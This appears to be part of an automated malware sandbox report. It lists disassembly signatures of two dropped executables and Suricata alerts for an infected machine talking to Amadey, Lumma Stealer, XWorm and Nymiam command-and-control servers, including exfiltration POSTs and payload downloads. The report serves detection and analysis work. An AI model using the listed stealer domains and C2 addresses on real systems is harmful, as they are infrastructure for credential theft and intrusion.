Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h	11_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then dec ebx	11_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E389C079h	11_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4802CC78h	11_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+04h]	11_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, ecx	11_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov edi, ecx	11_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx]	11_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	11_2_00431703
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	11_2_00430F10
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_0042F7E0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, ecx	11_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	11_2_00402780
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000EFh]	11_2_0041BF8A
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then push esi	23_2_00442050
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0000025Fh]	23_2_004198DF
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_00410B14
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov byte ptr [edi], cl	23_2_00433570
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	23_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3183FE40h	23_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	23_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	23_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov esi, eax	23_2_00433F09
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	23_2_00424FE0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov byte ptr [esi], cl	23_2_0041F803
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ecx, eax	23_2_00433805
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov byte ptr [edi], cl	23_2_00433805
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	23_2_00430020
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ecx, ebx	23_2_00407830
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov dword ptr [ebp+00h], 00000022h	23_2_004300C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+04h]	23_2_004468C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ecx, eax	23_2_0040C900
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ecx, eax	23_2_0042C910
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	23_2_0042C930
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ebp, eax	23_2_004089F0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	23_2_004461A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	23_2_0040A260
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	23_2_0040A260
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov dword ptr [esp], eax	23_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov ecx, eax	23_2_00426210
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov esi, eax	23_2_00426210
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov byte ptr [edi], bl	23_2_0040C220
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	23_2_0041BA2A
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	23_2_0040B2C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]	23_2_0042F2C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [eax], cx	23_2_004202A8
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [esi], ax	23_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_0043335D
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [esi], ax	23_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then jmp eax	23_2_0040DB7B
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx-54AE03E6h]	23_2_0040E320
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], FD7B050Ah	23_2_00411B24
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, eax	23_2_00440334
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_00443B30
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then jmp eax	23_2_0040DB81
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	23_2_0041C475
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ebx, bx	23_2_0042B494
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	23_2_00431540
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	23_2_0043BD70
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	23_2_00418510
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2C5CD9C2h]	23_2_00443DDD
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_0041D670
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-49h]	23_2_0041D670
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov edx, ecx	23_2_00443632
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+7B7A28AEh]	23_2_004196D1
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov eax, esi	23_2_0040EEDE
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov word ptr [eax], cx	23_2_004206B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	23_2_004206B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	23_2_00422F40
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	23_2_00442740
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-5062AC8Eh]	23_2_0041FF62
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then mov byte ptr [esi], cl	23_2_0041F719
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then push esi	23_2_0041C7D2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7E0BBB3Dh]	23_2_0042EFAA

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49822 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49871 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com) : 192.168.2.6:61655 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49898 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49892 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49906 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49834
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49912 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49932 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49939 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49941 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49967 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.6:49965 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:49986 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.2.6:58355 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50001 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50003 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50007 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50010 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50015 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50024 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50030 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50035 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50041 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50047 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50053 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50058 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50055 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50059 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50062 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50066 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50071 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50069 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50078 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50076 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50064 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50084 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50072 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50085 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50074 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50090 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50081 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.6:50087 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50077 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50079 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50086 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50075 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50091 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50092 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50094 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50097 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 95.216.115.242:33333 -> 192.168.2.6:50068
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:50068 -> 95.216.115.242:33333
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50104 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50126 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50057 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059932 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI) : 192.168.2.6:50067 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50145 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50151 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50156 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50168 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 95.216.115.242:33333 -> 192.168.2.6:50068
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50183 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.6:53486 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50186 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50191 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50187 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50190 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50068 -> 95.216.115.242:33333
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50188 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50196 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50197 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.2.6:50201 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50202 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50198 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50204 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50206 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50217 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50221 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50218 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50222 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50224 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50225 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50228 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50231 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50230 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50232 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50236 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50237 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50239 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.6:50234 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50241 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50245 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.6:50234 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.6:50234 -> 185.156.73.23:80
